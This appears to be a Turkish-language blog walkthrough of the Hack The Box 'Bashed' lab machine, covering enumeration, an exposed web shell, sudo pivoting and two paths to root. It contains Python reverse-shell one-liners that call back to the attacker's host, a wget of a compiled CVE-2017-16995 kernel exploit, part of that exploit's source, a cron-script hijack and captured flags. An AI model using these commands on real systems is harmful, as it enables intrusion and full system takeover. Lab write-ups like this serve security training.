İçeriğe geç

Bashed

Tarih: 03/08/2021 | Yazar: kuday
Makine Adı Seviye OS Logo
Bashed - HTB Kolay Linux

Walkthrough

nmap taraması ile başlayalım.


PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

gobuster ile devam edelim.

┌──(root💀kali)-[~/htb/Linux/Bashed]
└─# gobuster dir --add-slash --expanded --extensions php,txt,html,js --follow-redirect --url http://10.10.10.68/ --no-error -t 50 --wordlist /usr/share/wordlists/dirb/big.txt | tee gobuster1
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.68/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              html,js,php,txt
[+] Add Slash:               true
[+] Follow Redirect:         true
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
2021/08/02 18:47:18 Starting gobuster in directory enumeration mode
===============================================================
http://10.10.10.68/.htaccess.php        (Status: 403) [Size: 299]
http://10.10.10.68/.htaccess.txt        (Status: 403) [Size: 299]
http://10.10.10.68/.htaccess.html       (Status: 403) [Size: 300]
http://10.10.10.68/.htaccess.js         (Status: 403) [Size: 298]
http://10.10.10.68/.htaccess/           (Status: 403) [Size: 296]
http://10.10.10.68/.htpasswd.php        (Status: 403) [Size: 299]
http://10.10.10.68/.htpasswd.txt        (Status: 403) [Size: 299]
http://10.10.10.68/.htpasswd.html       (Status: 403) [Size: 300]
http://10.10.10.68/.htpasswd.js         (Status: 403) [Size: 298]
http://10.10.10.68/.htpasswd/           (Status: 403) [Size: 296]
http://10.10.10.68/about.html           (Status: 200) [Size: 8193]
http://10.10.10.68/config.php           (Status: 200) [Size: 0]   
http://10.10.10.68/contact.html         (Status: 200) [Size: 7805]
http://10.10.10.68/css/                 (Status: 200) [Size: 1758]
http://10.10.10.68/dev/                 (Status: 200) [Size: 1148]
http://10.10.10.68/fonts/               (Status: 200) [Size: 2095]
http://10.10.10.68/icons/               (Status: 403) [Size: 292] 
http://10.10.10.68/images/              (Status: 200) [Size: 1564]
http://10.10.10.68/index.html           (Status: 200) [Size: 7743]
http://10.10.10.68/js/                  (Status: 200) [Size: 3165]
http://10.10.10.68/php/                 (Status: 200) [Size: 939] 
http://10.10.10.68/scroll.html          (Status: 200) [Size: 10863]
http://10.10.10.68/server-status/       (Status: 403) [Size: 300]  
http://10.10.10.68/single.html          (Status: 200) [Size: 7477] 
http://10.10.10.68/uploads/             (Status: 200) [Size: 14]

İnternet sayfasına gittiğimde bir web shell hizmeti veren github projesi olduğunu gördüm. Bunun üzerine sistemde web shell aradım ve http://10.10.10.68/dev/phpbash.php adresinde buldum. Python ile reverse alalım.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.15",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
┌──(root💀kali)-[~]
└─# nc -lvp 4444
listening on [any] 4444 ...
10.10.10.68: inverse host lookup failed: Unknown host
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.68] 39346
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data

İlk flag:


$ ls
total 36
drwxr-xr-x 4 arrexel arrexel 4096 Dec  4  2017 .
drwxr-xr-x 4 root    root    4096 Dec  4  2017 ..
-rw------- 1 arrexel arrexel    1 Dec 23  2017 .bash_history
-rw-r--r-- 1 arrexel arrexel  220 Dec  4  2017 .bash_logout
-rw-r--r-- 1 arrexel arrexel 3786 Dec  4  2017 .bashrc
drwx------ 2 arrexel arrexel 4096 Dec  4  2017 .cache
drwxrwxr-x 2 arrexel arrexel 4096 Dec  4  2017 .nano
-rw-r--r-- 1 arrexel arrexel  655 Dec  4  2017 .profile
-rw-r--r-- 1 arrexel arrexel    0 Dec  4  2017 .sudo_as_admin_successful
-r--r--r-- 1 arrexel arrexel   33 Dec  4  2017 user.txt
$ cat user.txt  
2c281f318555dbc1b856957c7147bfc1

Şimdi yetki yükseltelim.

www-data@bashed:/tmp$ sudo -l
sudo -l
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL
www-data@bashed:/tmp$ 

www-data@bashed:/tmp$ sudo -u scriptmanager /bin/bash
sudo -u scriptmanager /bin/bash
scriptmanager@bashed:/tmp$ id
id
uid=1001(scriptmanager) gid=1001(scriptmanager) groups=1001(scriptmanager)

root olmak için incelemeler yaparken ilk olarak kernel exploit ile root oldum ancak root olduktan sonra başka bir şekilde root olabileceğime inanıyordum çünkü enum aşamasında aşağıdaki sonuçları bulmuştum. Buradaki python script'i boşuna bırakılmamıştır diye düşünmüştüm.

scriptmanager@bashed:/$ find / -writable -type f -exec ls -al {} \; 2>/dev/null
<d / -writable -type f -exec ls -al {} \; 2>/dev/null                        
-rw-r--r-- 1 scriptmanager scriptmanager 58 Dec  4  2017 /scripts/test.py
-rw-r--r-- 1 scriptmanager scriptmanager 655 Dec  4  2017 /home/scriptmanager/.profile
-rw-r--r-- 1 scriptmanager scriptmanager 3786 Dec  4  2017 /home/scriptmanager/.bashrc
-rw------- 1 scriptmanager scriptmanager 2 Dec  4  2017 /home/scriptmanager/.bash_history
-rw-r--r-- 1 scriptmanager scriptmanager 220 Dec  4  2017 /home/scriptmanager/.bash_logout
--w--w--w- 1 root root 0 Aug  2 16:03 /sys/fs/cgroup/memory/cgroup.event_control
-rw-rw-rw- 1 root root 0 Aug  2 15:43 /sys/kernel/security/apparmor/policy/.remove

...

Linux makinelerde yaptığım lse.sh script'ini çalıştırdım daha sonrasında kernelpop çalıştırdım ve aşağıdaki exploit ile root olabilidm.


scriptmanager@bashed:/tmp/kernelpop-master$ python kernelpop.py
python kernelpop.py

##########################                                                                                                                                   
#  welcome to kernelpop  #                                                                                                                                   
#                        #                                                                                                                                   
# let's pop some kernels #                                                                                                                                   
##########################                                                                                                                                   

[*] grabbing distro version and release from underlying OS (linuxubuntu16)
[*] grabbing kernel version from 'uname -a'
[!] could only get the kernel base...may not have accurate matches
[+] kernel (Linux bashed 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux) identified as:
[base]
        type:                   linux
        distro:                 linuxubuntu16
        version:                4.4.0-62
        architecture:           x86_64
[!] no specific distro kernel discovered...likelihood of false positives is high
[*] matching kernel to known exploits
[+] discovered 9 possible exploits !
        [[ base linux kernel vulnerable ]]
                CVE20177308     `packet_set_ring` in net/packet/af_packet.c can gain privileges via crafted system calls.
                CVE20160728     `join_session_keyring` function can be abused to get root NOTE: (takes about 30 minutes)
                CVE20162384     Double free vulnerability in the `snd_usbmidi_create` (requires physical proximity)
                CVE20165195_64  Dirty COW race condition root priv esc for 64 bit
                CVE20165195_64_poke     Dirty COW race condition root priv esc for 64 bit (poke variant)
                CVE20173630     Stack clash vuln in solaris
                CVE20176074     `dccp_rcv_state_process` in net/dccp/input.c mishandles structs and can lead to local root
                CVE201716996    eBPF Verifier check_alu_op() Sign Extension Local Root Exploit
                CVE20171000112  ip_ufo_append_data() memory corruption flaw can be exploited to gain root privileges.

Makinede gcc yoktu, kalimde derleyerek sırasıyla gittim ve CVE201716996 explotinde başarılı oldum.


┌──(root💀kali)-[~/tool/kernelpop]
└─# python3 kernelpop.py -e CVE201716996 -d             

##########################                                                                                                                                   
#  welcome to kernelpop  #                                                                                                                                   
#                        #                                                                                                                                   
# let's pop some kernels #                                                                                                                                   
##########################                                                                                                                                   

[*] attempting to locate exploit CVE201716996
        [+] exploit found!
        [*] writing the exploit source to disk (/tmp/CVE201716996.c)
[+] successfully written to disk

┌──(root💀kali)-[~/tool/kernelpop]
└─# head /tmp/CVE201716996.c

/*
  Credit @bleidl, this is a slight modification to his original POC
  https://github.com/brl/grlh/blob/master/get-rekt-linux-hardened.c

  For details on how the exploit works, please visit
  https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html

  Tested on Ubuntu 16.04 with the following Kernels
  4.4.0-31-generic

┌──(root💀kali)-[~/tool/kernelpop]
└─# head /tmp/CVE201716996.c -n 50

/*
  Credit @bleidl, this is a slight modification to his original POC
  https://github.com/brl/grlh/blob/master/get-rekt-linux-hardened.c

  For details on how the exploit works, please visit
  https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html

  Tested on Ubuntu 16.04 with the following Kernels
  4.4.0-31-generic
  4.4.0-62-generic
  4.4.0-81-generic
  4.4.0-116-generic
  4.8.0-58-generic
  4.10.0.42-generic
  4.13.0-21-generic

  Tested on Fedora 27
  4.13.9-300
  gcc cve-2017-16995.c -o cve-2017-16995
  internet@client:~/cve-2017-16995$ ./cve-2017-16995
  [.]
  [.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
  [.]
  [.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
  [.]
  [*] creating bpf map
  [*] sneaking evil bpf past the verifier
  [*] creating socketpair()
  [*] attaching bpf backdoor to socket
  [*] skbuff => ffff880038c3f500  
  [*] Leaking sock struct from ffff88003af5e180
  [*] Sock->sk_rcvtimeo at offset 472
  [*] Cred structure at ffff880038704600
  [*] UID from cred structure: 1000, matches the current: 1000
  [*] hammering cred structure at ffff880038704600
  [*] credentials patched, launching shell...
  #id
  uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare),1000(internet)

*/

#include <errno.h>
#include <fcntl.h>
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <linux/bpf.h>

┌──(root💀kali)-[~/tool/kernelpop]
└─# gcc /tmp/CVE201716996.c -o /root/htb/Linux/Bashed/CVE201716996

exploti derledikten sonra hedef makineye http üzerinden yolladım.


scriptmanager@bashed:/tmp$ id
id
uid=1001(scriptmanager) gid=1001(scriptmanager) groups=1001(scriptmanager)
scriptmanager@bashed:/tmp$ wget http://10.10.14.15/CVE201716996
wget http://10.10.14.15/CVE201716996
--2021-08-02 16:43:32--  http://10.10.14.15/CVE201716996
Connecting to 10.10.14.15:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 22272 (22K) [application/octet-stream]
Saving to: 'CVE201716996'

CVE201716996        100%[===================>]  21.75K  --.-KB/s    in 0.08s   

2021-08-02 16:43:32 (287 KB/s) - 'CVE201716996' saved [22272/22272]

scriptmanager@bashed:/tmp$ chmod 777 CVE201716996
chmod 777 CVE201716996
scriptmanager@bashed:/tmp$ ./CVE201716996
./CVE201716996
[.] 
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.] 
[.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.] 
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff8800366cbf00
[*] Leaking sock struct from ffff88003677c400
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff88000003d380
[*] UID from cred structure: 1001, matches the current: 1001
[*] hammering cred structure at ffff88000003d380
[*] credentials patched, launching shell...
# id
id
uid=0(root) gid=0(root) groups=0(root),1001(scriptmanager)
# cd /root
cd /root
# ls
ls
root.txt
# cat root.txt
cat root.txt
cc4f0afe3a1026d402ba10329674a8e2

Evet! Şimdi gelelim 2. yola. Bulduğum test.py dosyasının belirli aralıklarla çalıştırıldığını farkettim. İçeriğini okduğumuzda test.txt dosyası oluşturup içine yazıyor. Şimdi aşağıdaki iki ls komutuna ve test.txt dosyalarının oluşturulam tarihlerine bakın.


scriptmanager@bashed:/scripts$ ls
ls
total 16
drwxrwxr--  2 scriptmanager scriptmanager 4096 Dec  4  2017 .
drwxr-xr-x 23 root          root          4096 Dec  4  2017 ..
-rw-r--r--  1 scriptmanager scriptmanager   58 Dec  4  2017 test.py
-rw-r--r--  1 root          root            12 Aug  2 16:51 test.txt
scriptmanager@bashed:/scripts$ cat test.py
cat test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close
scriptmanager@bashed:/scripts$ ls -al  
ls -al
total 16
drwxrwxr--  2 scriptmanager scriptmanager 4096 Dec  4  2017 .
drwxr-xr-x 23 root          root          4096 Dec  4  2017 ..
-rw-r--r--  1 scriptmanager scriptmanager   58 Dec  4  2017 test.py
-rw-r--r--  1 root          root            12 Aug  2 16:52 test.txt

Bunun üzerine kalimde bir python reverse oluşturdum ve buraya http aracılığı ile kopyaladım.


wget http://10.10.14.15/test.py
--2021-08-02 16:56:32--  http://10.10.14.15/test.py
Connecting to 10.10.14.15:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 258 [text/x-python]
Saving to: 'test.py'

test.py             100%[===================>]     258  --.-KB/s    in 0s      

2021-08-02 16:56:32 (34.6 MB/s) - 'test.py' saved [258/258]

scriptmanager@bashed:/scripts$ cat test.py
cat test.py
import os

os.system("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.15\",1822));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'")


(root💀kali)-[~]
└─# nc -lvp 1822
listening on [any] 1822 ...
10.10.10.68: inverse host lookup failed: Unknown host
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.68] 48108
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
#
Kategori:Walkthrough

İlk Yorumu Siz Yapın

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir